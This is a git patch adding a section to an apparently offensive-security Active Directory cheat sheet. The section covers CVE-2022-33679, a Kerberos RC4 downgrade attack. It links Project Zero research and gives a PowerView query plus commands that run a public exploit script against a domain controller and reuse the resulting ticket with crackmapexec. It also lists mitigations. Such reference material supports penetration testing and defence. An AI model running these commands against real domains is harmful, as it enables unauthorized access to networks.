From 8156f495fbc732fa9a25c6faaf61608a16221ea2 Mon Sep 17 00:00:00 2001 From: m3dsec <51140478+m3dsec@users.noreply.github.com> Date: Sun, 30 Apr 2023 21:45:33 +0100 Subject: [PATCH] Add Kerberos CVE-2022-33679 (RC4 Is Still Considered Harmful) --- .../Active Directory Attack.md | 25 ++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 921a88e..7e6c40b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -60,6 +60,7 @@ - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) - [Kerberoasting](#kerberoasting) - [KRB_AS_REP Roasting](#krb_as_rep-roasting) + - [CVE-2022-33679 (RC4 Is Still Considered Harmful)](#cve-2022-33679-rc4-is-still-considered-harmful) - [Timeroasting](#timeroasting) - [Pass-the-Hash](#pass-the-hash) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) @@ -1980,6 +1981,28 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). + +## CVE-2022-33679 (RC4 Is Still Considered Harmful) + +> CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password.. + +Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html + +**Requirements**: +- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) + +* using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) + ```bash + user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL + user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache + user@hostname:~$ crackmapexec smb DC01.DOMAIN.LOCAL -k --shares + ``` + +**Mitigations**: +* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). +* Disable RC4 cipher if possible. + + ## Timeroasting > Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID @@ -4391,4 +4414,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) * [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) -* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) \ No newline at end of file +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)